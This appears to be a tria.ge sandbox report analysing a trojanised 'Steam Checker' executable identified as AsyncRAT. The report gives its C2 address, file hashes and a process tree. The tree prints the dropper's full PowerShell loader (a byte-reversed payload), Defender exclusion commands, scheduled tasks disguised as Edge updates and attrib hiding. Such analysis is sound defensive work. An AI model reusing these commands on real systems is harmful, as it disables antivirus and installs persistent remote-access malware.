Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

Steam Chec...ne.dll

windows7-x64

1

Steam Chec...ne.dll

windows10-2004-x64

1

Steam Chec...52.dll

windows7-x64

1

Steam Chec...52.dll

windows10-2004-x64

1

Steam Chec...me.dll

windows7-x64

1

Steam Chec...me.dll

windows10-2004-x64

1

Steam Chec...in.dll

windows7-x64

1

Steam Chec...in.dll

windows10-2004-x64

1

Steam Chec...gn.dll

windows7-x64

1

Steam Chec...gn.dll

windows10-2004-x64

1

Steam Chec...ts.dll

windows7-x64

1

Steam Chec...ts.dll

windows10-2004-x64

1

Steam Chec...rk.dll

windows7-x64

1

Steam Chec...rk.dll

windows10-2004-x64

1

Steam Chec....0.dll

windows7-x64

1

Steam Chec....0.dll

windows10-2004-x64

1

Steam Chec...on.dll

windows7-x64

1

Steam Chec...on.dll

windows10-2004-x64

1

Steam Chec...on.exe

windows7-x64

10

Steam Chec...on.exe

windows10-2004-x64

10

Steam Chec...ne.dll

windows7-x64

1

Steam Chec...ne.dll

windows10-2004-x64

1

Steam Chec...en.dll

windows7-x64

1

Steam Chec...en.dll

windows10-2004-x64

1

Steam Chec...ig.bat

windows7-x64

10

Steam Chec...ig.bat

windows10-2004-x64

10

Steam Chec...C2.ps1

windows7-x64

1

Steam Chec...C2.ps1

windows10-2004-x64

1

Steam Chec...To.ps1

windows7-x64

1

Steam Chec...To.ps1

windows10-2004-x64

1

Steam Chec...rk.bat

windows7-x64

10

Steam Chec...rk.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    01/01/2023, 04:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Steam Checker By abbadon/Steam Checker V0.1 By Abbadon.exe

  • Size

    121KB

  • MD5

    f0bfac0acff34c1e85a1fa3b63c315a6

  • SHA1

    52b9ab7aa6b1836ae278da3575c5c7338f2c43b5

  • SHA256

    2ddc9622baef1953e848b441d949bea26e22097149a44b04f0fa870e334c549a

  • SHA512

    fd4021d4638ffb54afa237b372f92768a105cd1b1fa7a7012ca64e4bfab73c91f826191b9d07aff09bc26f170b1aea673dd9e08be5fb311708177a7ed4a7fdbc

  • SSDEEP

    3072:5bCyJlgzy96ZZZZZZZZZZZZZZZZMZZZZZZZZZZvZZZZZZZZZZZZZZZZZZZZZZZZ+:5bIy9Wq

Score
10/10
asyncratcrat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

C

C2

185.81.157.169:2023

Mutex

7G6ZCBCA-NJ11-YS93-65bg-CX918E7238D5

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\Steam Checker V0.1 By Abbadon.exe
    "C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\Steam Checker V0.1 By Abbadon.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3504
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName Microsoft.VisualBasic [String] $Config_Path = 'C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon' + '\config\config' [String] $Tool_Path = 'C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon' + '\config\config\Rev.exe' try { if ([System.IO.File]::Exists($Config_Path + '\A1.exe') -eq $true) { [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } [String[]] $PSCommands = @('@shift /0', '@echo off', '@setlocal enableextensions', '@cd /d "%~dp0"', 'config\Config.bat') [System.Diagnostics.Process] $Proc = New-Object System.Diagnostics.Process [System.Diagnostics.ProcessStartInfo] $StartInfo = New-Object System.Diagnostics.ProcessStartInfo $StartInfo.FileName = 'cmd.exe' $StartInfo.RedirectStandardInput = $true $StartInfo.UseShellExecute = $false $StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden $StartInfo.CreateNoWindow = $true $Proc.StartInfo = $StartInfo $Proc.Start() [System.IO.StreamWriter] $SW = $Proc.StandardInput if ($SW.BaseStream.CanWrite -eq $true) { $SW.WriteLine($PSCommands[0]) $SW.WriteLine($PSCommands[1]) $SW.WriteLine($PSCommands[2]) $SW.WriteLine($PSCommands[3]) $SW.WriteLine($PSCommands[4]) } [System.Threading.Thread]::Sleep(3000) if ([System.IO.File]::Exists($Tool_Path) -eq $true) { [Byte[]] $Rev_Bytes = [System.IO.File]::ReadAllBytes($Tool_Path) [Array]::Reverse($Rev_Bytes) [System.IO.FileStream] $FS = [System.IO.File]::Create($Config_Path + '\A1.exe') $FS.Write($Rev_Bytes, 0, $Rev_Bytes.Length) $FS.Close() $FS.Dispose() [System.IO.File]::Delete($Tool_Path) [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } } catch { }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\config\config\A1.exe
        "C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\config\config\A1.exe"
        3⤵
          PID:5048
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1960
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3532
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\Users" -force
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 1 /tn "Microsoft\MicrosoftEdgeUpdates\EdgeUpdate" /tr "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exe" /RL HIGHEST /f
            4⤵
            • Creates scheduled task(s)
            PID:3848
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 1 /tn "Microsoft\SystemUpdates\SysUpdate" /tr "C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe" /RL HIGHEST /f
            4⤵
            • Creates scheduled task(s)
            PID:4380
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates
            4⤵
            • Views/modifies file attributes
            PID:3400
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Roaming\SystemUpdates
            4⤵
            • Views/modifies file attributes
            PID:4356
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File CopyTo.PS1
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4864
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C2.PS1
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4408
    • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exe
      C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: AddClipboardFormatListener
      PID:3536
    • C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe
      C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:5056
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
          PID:4812
      • C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe
        C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          2⤵
            PID:5008

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SystemUpdates.exe.log
          Filesize

          1KB

          MD5

          bfff6869253ff041b2b0be465df8bad1

          SHA1

          d87fbcb54700714919232c4236fa4bb6df589797

          SHA256

          889e9627d5df84d62c212051b683081e2852a5f6f8de17bf046ccf91b8b2d84d

          SHA512

          f4bb23a3805b65b825f1a1a954b807fed0c5f8b9f830e045efb3fe86200bccb52a4c41fe954ddf3c653afd5a31c1ead2785e67d39799e0bcad2a52a94b895a29

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          1KB

          MD5

          8aaa67dbcfbb460fb6d31b063a6360b0

          SHA1

          f9948a8e4ca47efd24d3a975c9b50423e2bb689a

          SHA256

          5501bb230eda460ffb7ded4ccd8b8374b8d0f645a8e102b1be9df67287f517e9

          SHA512

          f2239b4421fa6b0c304562d946ae1d14904bb6b0f51637302721a925668bd6f8cc6a8ce6bc8d87f3294e719de1ec1fadf76dacb5c72fa584b787501aa6177f20

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          16KB

          MD5

          33f23d339508fe8b8241745987420c96

          SHA1

          dbe4bab3701b4a35f09cf9475ede1eacee63797d

          SHA256

          4ccd6bc7f369c3beab4beade8989bb1c8042189e5b17967b2f212713f07c891a

          SHA512

          38b16ba940848dcdf0135eb7529e8bfaef8088863838964ba9144874cfe9dc95b47cb01d459503b4871e6412375f5693e05b9844b5fd98f3fa1ce6f531f5ae6a

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          16KB

          MD5

          33f23d339508fe8b8241745987420c96

          SHA1

          dbe4bab3701b4a35f09cf9475ede1eacee63797d

          SHA256

          4ccd6bc7f369c3beab4beade8989bb1c8042189e5b17967b2f212713f07c891a

          SHA512

          38b16ba940848dcdf0135eb7529e8bfaef8088863838964ba9144874cfe9dc95b47cb01d459503b4871e6412375f5693e05b9844b5fd98f3fa1ce6f531f5ae6a

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          98cf1c8c2c19b839a9ed443902bdc1b9

          SHA1

          6c1596d2b9c082da880e5e9118695ac1a0b0ccb2

          SHA256

          847ea08a17eebae95435278cf2e413076a34e6d90d8ef26806a2d5290a439523

          SHA512

          62dd11df454cc7d30a3f5a4fbfd694ae36e144073f42a3421414f2183ac692f026d7356446d718aae578382509589387bc3adbb29d8054dfcd5cc9359f33bf52

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          12KB

          MD5

          ed8817283701a7e457d190ad74543ae2

          SHA1

          9e79d287aa5d5dfc5e84626833b6bfa096b1ea27

          SHA256

          607daec3bc51dd39c7183a4410443e7e3a039ff9b7bd5a638c30f401eda1744a

          SHA512

          66f52fc38fec8df3e5f0912e62729edcee2c88940316affa40a8e233551edecccd680e2af5b7aa59ce4084c99885523984f814c5054539e0c6cabf5fcafb5edc

          Download Submit

        • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exe
          Filesize

          15KB

          MD5

          492bd942c673806c4dc7d076d44a06de

          SHA1

          ace44cc6d1f875aa1b58c2c0c51901f9c11b0221

          SHA256

          30e04b25281b27e83652be61a8a61821730e30be65a95452c3b93a7a17333f00

          SHA512

          8a328d28055337629823795dcc96adf1fce2dba6079ec29472b81f8b89917d6b312efc0ec566732effcbfa95ddf96848dead444900096ed71da590dd3861477f

          Download Submit

        • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exe
          Filesize

          15KB

          MD5

          492bd942c673806c4dc7d076d44a06de

          SHA1

          ace44cc6d1f875aa1b58c2c0c51901f9c11b0221

          SHA256

          30e04b25281b27e83652be61a8a61821730e30be65a95452c3b93a7a17333f00

          SHA512

          8a328d28055337629823795dcc96adf1fce2dba6079ec29472b81f8b89917d6b312efc0ec566732effcbfa95ddf96848dead444900096ed71da590dd3861477f

          Download Submit

        • C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe
          Filesize

          242KB

          MD5

          640d55589c839016931890b47305d638

          SHA1

          bf5062f9c16a3966abe3e7dbb083f539f1b38126

          SHA256

          6dba74aedcdd6b0f36d2b7ea79b9c9f40fe669ac41ec0560bc67d4039279f689

          SHA512

          da1142c340124a682f88790d06434c42e9df0ce9ebbe21920235db9de76800728f47a96aa489bf6673b426d16172664dcb4af1e1c134623d0a6eebe20fb7baaa

          Download Submit

        • C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe
          Filesize

          242KB

          MD5

          640d55589c839016931890b47305d638

          SHA1

          bf5062f9c16a3966abe3e7dbb083f539f1b38126

          SHA256

          6dba74aedcdd6b0f36d2b7ea79b9c9f40fe669ac41ec0560bc67d4039279f689

          SHA512

          da1142c340124a682f88790d06434c42e9df0ce9ebbe21920235db9de76800728f47a96aa489bf6673b426d16172664dcb4af1e1c134623d0a6eebe20fb7baaa

          Download Submit

        • C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe
          Filesize

          242KB

          MD5

          640d55589c839016931890b47305d638

          SHA1

          bf5062f9c16a3966abe3e7dbb083f539f1b38126

          SHA256

          6dba74aedcdd6b0f36d2b7ea79b9c9f40fe669ac41ec0560bc67d4039279f689

          SHA512

          da1142c340124a682f88790d06434c42e9df0ce9ebbe21920235db9de76800728f47a96aa489bf6673b426d16172664dcb4af1e1c134623d0a6eebe20fb7baaa

          Download Submit

        • memory/1984-170-0x0000000070FC0000-0x000000007100C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2876-140-0x00000000059D0000-0x0000000005A36000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2876-142-0x0000000005FB0000-0x00000000060B2000-memory.dmp

          Filesize

          1.0MB

          Download

        • memory/2876-146-0x0000000007570000-0x000000000760C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/2876-145-0x0000000006650000-0x000000000666A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2876-144-0x0000000007750000-0x0000000007DCA000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/2876-143-0x0000000006100000-0x000000000611E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2876-135-0x0000000004960000-0x0000000004996000-memory.dmp

          Filesize

          216KB

          Download

        • memory/2876-141-0x00000000058C0000-0x00000000058D0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2876-139-0x00000000058F0000-0x0000000005956000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2876-136-0x0000000005150000-0x0000000005778000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/2876-138-0x0000000005110000-0x0000000005132000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2876-137-0x0000000004E90000-0x0000000004F12000-memory.dmp

          Filesize

          520KB

          Download

        • memory/3504-133-0x0000000005790000-0x0000000005D34000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/3504-132-0x0000000000920000-0x0000000000944000-memory.dmp

          Filesize

          144KB

          Download

        • memory/3532-161-0x00000000078B0000-0x00000000078FA000-memory.dmp

          Filesize

          296KB

          Download

        • memory/3532-164-0x0000000007960000-0x000000000797A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/3532-165-0x0000000007950000-0x0000000007958000-memory.dmp

          Filesize

          32KB

          Download

        • memory/3532-163-0x0000000007900000-0x000000000790E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/3532-162-0x00000000079A0000-0x0000000007A36000-memory.dmp

          Filesize

          600KB

          Download

        • memory/3532-160-0x00000000076E0000-0x00000000076EA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3532-159-0x0000000006900000-0x000000000691E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3532-158-0x0000000070FC0000-0x000000007100C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3532-157-0x0000000006920000-0x0000000006952000-memory.dmp

          Filesize

          200KB

          Download

        • memory/3536-183-0x0000000000BB0000-0x0000000000BBA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4812-186-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

          Download

        • memory/5048-153-0x0000000005290000-0x00000000052B4000-memory.dmp

          Filesize

          144KB

          Download

        • memory/5048-156-0x0000000008FE0000-0x000000000908A000-memory.dmp

          Filesize

          680KB

          Download

        • memory/5048-148-0x0000000000660000-0x00000000006B0000-memory.dmp

          Filesize

          320KB

          Download

        • memory/5048-149-0x00000000052D0000-0x0000000005362000-memory.dmp

          Filesize

          584KB

          Download

        • memory/5048-151-0x0000000005240000-0x000000000524A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/5048-152-0x0000000005480000-0x00000000054D6000-memory.dmp

          Filesize

          344KB

          Download

        • memory/5048-155-0x0000000005EF0000-0x0000000005F4C000-memory.dmp

          Filesize

          368KB

          Download

        • memory/5056-184-0x00000000004F0000-0x0000000000532000-memory.dmp

          Filesize

          264KB

          Download